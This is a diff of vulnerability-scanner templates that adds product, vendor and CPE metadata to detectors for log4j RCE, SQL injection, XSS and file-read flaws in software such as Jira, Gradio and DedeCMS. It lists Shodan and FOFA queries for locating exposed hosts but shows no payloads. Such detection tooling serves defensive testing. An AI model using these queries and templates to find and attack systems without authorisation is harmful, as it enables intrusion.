+# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/zend-server-test-page.yaml b/http/technologies/zend-server-test-page.yaml
index 431b5f6cbf..57d33306e9 100644
--- a/http/technologies/zend-server-test-page.yaml
+++ b/http/technologies/zend-server-test-page.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Zend Server Test Page"
+ product: zend_server
+ vendor: zend
tags: tech,zend
+ classification:
+ cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml
index 6508ef3296..b4b482414e 100644
--- a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml
+++ b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml
@@ -12,7 +12,11 @@ info:
verified: true
max-request: 1
fofa-query: app="骑士-74CMS"
+ product: 74cms
+ vendor: 74cms
tags: 74cms,weixin,sqli
+ classification:
+ cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
variables:
num: '999999999'
diff --git a/http/vulnerabilities/apache/apache-nifi-rce.yaml b/http/vulnerabilities/apache/apache-nifi-rce.yaml
index b78b1e050d..383b479033 100644
--- a/http/vulnerabilities/apache/apache-nifi-rce.yaml
+++ b/http/vulnerabilities/apache/apache-nifi-rce.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
shodan-query: "title:\"NiFi\""
+ product: nifi
+ vendor: apache
tags: packetstorm,apache,nifi,rce
+ classification:
+ cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -44,4 +48,4 @@ http:
- type: json
json:
- .id
-# digest: 4b0a00483046022100823087d872f3a455924ecdc15097cdfee075237703e430052a76021a9dde5961022100a89d1b8d93adc5aa3081364ad7a0e725ef1c4a2c863d151b5331254588d3043a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100823087d872f3a455924ecdc15097cdfee075237703e430052a76021a9dde5961022100a89d1b8d93adc5aa3081364ad7a0e725ef1c4a2c863d151b5331254588d3043a:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
index e8010e3589..321f25b9ef 100644
--- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -17,9 +17,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.html:"Apache OFBiz"
+ product: ofbiz
+ vendor: apache
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
index a57240f6f8..33077362c8 100644
--- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
@@ -18,10 +18,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"Apache Solr"
+ product: solr
+ vendor: apache
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
@@ -73,4 +76,4 @@ http:
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-# digest: 4a0a00473045022060b0ff4627227932af965189042812bb6d42700a4d165a21af14defa05130797022100de39eba08fa9e66b3372fa708d8ce09109381c7269607247ce7b145789c09d7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022060b0ff4627227932af965189042812bb6d42700a4d165a21af14defa05130797022100de39eba08fa9e66b3372fa708d8ce09109381c7269607247ce7b145789c09d7a:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/avaya/avaya-aura-xss.yaml b/http/vulnerabilities/avaya/avaya-aura-xss.yaml
index a41ff0a1ed..e9fdcfcbdd 100644
--- a/http/vulnerabilities/avaya/avaya-aura-xss.yaml
+++ b/http/vulnerabilities/avaya/avaya-aura-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: html:"Avaya Aura"
+ product: aura_utility_services
+ vendor: avaya
tags: xss,avaya,aura,iot
http:
diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
index b20dc71a83..b6b19f8a12 100644
--- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
+++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
@@ -14,10 +14,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:cisco:unified_communications_domain_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Cisco Unified"
+ product: unified_communications_domain_manager
+ vendor: cisco
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml b/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml
index ab879def50..a51e04570a 100644
--- a/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml
+++ b/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:cisco:webex_meetings_online:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Cisco WebEx"
+ product: webex_meetings_online
+ vendor: cisco
tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
index 4baf3a5883..a90445c7db 100644
--- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
+++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1292923998,-1166125415
+ product: netscaler_gateway
+ vendor: citrix
tags: citrix,netscaller,gateway,oob
+ classification:
+ cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
http:
- raw:
- |+
@@ -35,4 +39,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
index 3bd72adcd1..5b78d74350 100644
--- a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"power by dedecms" || title:"dedecms"
+ product: dedecms
+ vendor: dedecms
tags: dedecms
+ classification:
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/dedecms/dedecms-config-xss.yaml b/http/vulnerabilities/dedecms/dedecms-config-xss.yaml
index 018cbec332..3896233878 100644
--- a/http/vulnerabilities/dedecms/dedecms-config-xss.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-config-xss.yaml
@@ -14,10 +14,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"DedeCms"
+ product: dedecms
+ vendor: dedecms
tags: dedecms,xss
http:
diff --git a/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml b/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
index f364bce651..3fc1e2997b 100644
--- a/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.html:"DedeCms"
+ product: dedecms
+ vendor: dedecms
tags: sqli,dedecms
variables:
num: "999999999"
diff --git a/http/vulnerabilities/dedecms/dedecms-openredirect.yaml b/http/vulnerabilities/dedecms/dedecms-openredirect.yaml
index 0f7af86f07..ce7d36c37a 100644
--- a/http/vulnerabilities/dedecms/dedecms-openredirect.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-openredirect.yaml
@@ -11,10 +11,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-601
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"power by dedecms" || title:"dedecms"
+ product: dedecms
+ vendor: dedecms
tags: dedecms,redirect
http:
diff --git a/http/vulnerabilities/dedecms/dedecms-rce.yaml b/http/vulnerabilities/dedecms/dedecms-rce.yaml
index f7c413bf1e..21f1fb2892 100644
--- a/http/vulnerabilities/dedecms/dedecms-rce.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-rce.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: app="DedeCMS"
+ product: dedecms
+ vendor: dedecms
tags: dedecms,cms,rce
+ classification:
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
index 9cd016e021..cae70c3ba7 100644
--- a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
+++ b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: title:"Discuz!"
fofa-query: title="Discuz!"
+ product: discuz\\!
+ vendor: comsenz
tags: discuz,info,disclosure
+ classification:
+ cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
index 370f73a64b..434a77531a 100644
--- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
+++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: 'server: "ecstatic"'
+ product: ecstatic
+ vendor: ecstatic_project
tags: node,js,listing,ecstatic
+ classification:
+ cpe: cpe:2.3:a:ecstatic_project:ecstatic:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -30,4 +34,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e5162037fa5a1215df51c336ce7672d6007dd8190b219c37131631ec9f2d6d85022100efe2b0d36b964e080f24d37b1ecf9018b17c2e072c99fa0a7784fd3784d09a94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e5162037fa5a1215df51c336ce7672d6007dd8190b219c37131631ec9f2d6d85022100efe2b0d36b964e080f24d37b1ecf9018b17c2e072c99fa0a7784fd3784d09a94:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
index 3fd5f7c79e..d8a5fabd98 100644
--- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
+++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
@@ -11,8 +11,11 @@ info:
vendor: esafenet
max-request: 1
fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+ product: cdg
tags: esafenet,sqli
+ classification:
+ cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -29,4 +32,4 @@ http:
- 'contains(body,"操作成功")'
- 'status_code == 200'
condition: and
-# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/froxlor-xss.yaml b/http/vulnerabilities/froxlor-xss.yaml
index 0b07ae3ad2..5c5ecf2d6c 100644
--- a/http/vulnerabilities/froxlor-xss.yaml
+++ b/http/vulnerabilities/froxlor-xss.yaml
@@ -10,10 +10,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Froxlor Server Management Panel"
+ product: froxlor
+ vendor: froxlor
tags: froxlor,xss
http:
diff --git a/http/vulnerabilities/gitea/gitea-rce.yaml b/http/vulnerabilities/gitea/gitea-rce.yaml
index f4495b52fb..5e5e022a3c 100644
--- a/http/vulnerabilities/gitea/gitea-rce.yaml
+++ b/http/vulnerabilities/gitea/gitea-rce.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 3
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
+ product: gitea
+ vendor: gitea
tags: gitea,rce,unauth,edb
+ classification:
+ cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/gitlab/gitlab-rce.yaml b/http/vulnerabilities/gitlab/gitlab-rce.yaml
index 0910779e36..f7e34b1ce9 100644
--- a/http/vulnerabilities/gitlab/gitlab-rce.yaml
+++ b/http/vulnerabilities/gitlab/gitlab-rce.yaml
@@ -15,9 +15,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-22205
cwe-id: CWE-20
+ cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"GitLab"
+ product: gitlab
+ vendor: gitlab
tags: oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev
http:
diff --git a/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml b/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
index c10d70ec57..e564d0bc5a 100644
--- a/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
+++ b/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Gnuboard"
+ product: gnuboard5
+ vendor: gnuboard
tags: xss,gnuboard
http:
diff --git a/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml b/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
index 6cbbef3295..2dd31c9d29 100644
--- a/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
+++ b/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"gnuboard5"
+ product: gnuboard5
+ vendor: gnuboard
tags: gnuboard,xss,huntr
http:
diff --git a/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml b/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml
index 06c8afed75..a318abb079 100644
--- a/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml
+++ b/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"gnuboard5"
+ product: gnuboard5
+ vendor: gnuboard
tags: xss,gnuboard,gnuboard5,huntr
http:
diff --git a/http/vulnerabilities/gradio/gradio-lfi.yaml b/http/vulnerabilities/gradio/gradio-lfi.yaml
index 1be770ce1e..46a57cc3b6 100644
--- a/http/vulnerabilities/gradio/gradio-lfi.yaml
+++ b/http/vulnerabilities/gradio/gradio-lfi.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
epss-percentile: 0.36659
+ cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: html:"__gradio_mode__"
+ product: gradio
+ vendor: gradio_project
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
http:
@@ -61,4 +64,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/gradio/gradio-ssrf.yaml b/http/vulnerabilities/gradio/gradio-ssrf.yaml
index 87c67f9d92..b3f0c205a1 100644
--- a/http/vulnerabilities/gradio/gradio-ssrf.yaml
+++ b/http/vulnerabilities/gradio/gradio-ssrf.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
epss-percentile: 0.36659
+ cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: html:"__gradio_mode__"
+ product: gradio
+ vendor: gradio_project
tags: cve,cve2024,unauth,gradio,ssrf
http:
@@ -55,4 +58,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/grafana/grafana-file-read.yaml b/http/vulnerabilities/grafana/grafana-file-read.yaml
index d2c118b320..1b20aa4de9 100644
--- a/http/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/http/vulnerabilities/grafana/grafana-file-read.yaml
@@ -17,9 +17,12 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-43798
cwe-id: CWE-22
+ cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 325
shodan-query: title:"Grafana"
+ product: grafana
+ vendor: grafana
tags: grafana,lfi
http:
diff --git a/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml b/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml
index 6d565d0df3..cb924d5212 100644
--- a/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml
+++ b/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml
@@ -12,9 +12,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:h:huawei:hg255s:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.html:"HG532e"
+ product: hg255s
+ vendor: huawei
tags: huawei,lfi,router
http:
diff --git a/http/vulnerabilities/j2ee/liferay-resource-leak.yaml b/http/vulnerabilities/j2ee/liferay-resource-leak.yaml
index dfbec051cf..1fd44ba92b 100644
--- a/http/vulnerabilities/j2ee/liferay-resource-leak.yaml
+++ b/http/vulnerabilities/j2ee/liferay-resource-leak.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Liferay"
+ product: liferay_portal
+ vendor: liferay
tags: liferay,lfi,j2ee
http:
diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
index 4a5e617378..42a1ce07fe 100644
--- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
@@ -16,10 +16,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:jamf:self_service:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"JamF"
+ product: self_service
+ vendor: jamf
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/jira/jira-servicedesk-signup.yaml b/http/vulnerabilities/jira/jira-servicedesk-signup.yaml
index 2397b0088d..dc2788d2b4 100644
--- a/http/vulnerabilities/jira/jira-servicedesk-signup.yaml
+++ b/http/vulnerabilities/jira/jira-servicedesk-signup.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-287
+ cpe: cpe:2.3:a:atlassian:jira_service_management:*:*:*:*:*:*:*:*
metadata:
max-request: 4
shodan-query: http.component:"Atlassian Jira"
+ product: jira_service_management
+ vendor: atlassian
tags: atlassian,servicedesk,jira,confluence
http:
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
index 9c8b53b72a..6bc535f2dc 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
+ product: jira
+ vendor: atlassian
tags: atlassian,jira
+ classification:
+ cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
index 8628c41074..e569b2817d 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
@@ -9,8 +9,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
+ product: jira
+ vendor: atlassian
tags: atlassian,jira
+ classification:
+ cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml
index be696309db..7c8c092ec8 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml
@@ -9,8 +9,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
+ product: jira_data_center
+ vendor: atlassian
tags: atlassian,jira
+ classification:
+ cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
index 0a88ec36aa..2fc6131f5d 100644
--- a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
+++ b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
+ product: jira_data_center
+ vendor: atlassian
tags: atlassian,jira
+ classification:
+ cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/juniper/junos-xss.yaml b/http/vulnerabilities/juniper/junos-xss.yaml
index 65691a796e..1ee53bcc2e 100644
--- a/http/vulnerabilities/juniper/junos-xss.yaml
+++ b/http/vulnerabilities/juniper/junos-xss.yaml
@@ -11,8 +11,12 @@ info:
max-request: 2
shodan-query: title:"Juniper Web Device Manager"
fofa-query: title="Juniper Web Device Manager"
+ product: junos
+ vendor: juniper
tags: junos,xss
+ classification:
+ cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
variables:
string: "{{to_lower(rand_base(2))}}"
@@ -48,4 +52,4 @@ http:
- ""
- "wrapper for"
condition: and
-# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/jupyter-notebook-rce.yaml b/http/vulnerabilities/jupyter-notebook-rce.yaml
index 374daf07c9..e305b6c725 100644
--- a/http/vulnerabilities/jupyter-notebook-rce.yaml
+++ b/http/vulnerabilities/jupyter-notebook-rce.yaml
@@ -14,8 +14,12 @@ info:
shodan-query: title:"jupyter notebook"
fofa-query: title="jupyter notebook"
zoomeye-query: title:"jupyter notebook"
+ product: notebook
+ vendor: jupyter
tags: jupyter,notebook,rce,bypass
+ classification:
+ cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/landray/landray-eis-sqli.yaml b/http/vulnerabilities/landray/landray-eis-sqli.yaml
index 0a629733d3..9f53e558aa 100644
--- a/http/vulnerabilities/landray/landray-eis-sqli.yaml
+++ b/http/vulnerabilities/landray/landray-eis-sqli.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="Landray-OA系统"
+ product: landray_office_automation
+ vendor: landray
tags: landray,eims,sqli
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,4 +29,4 @@ http:
- "Microsoft SQL Server"
- "SqlException"
condition: and
-# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
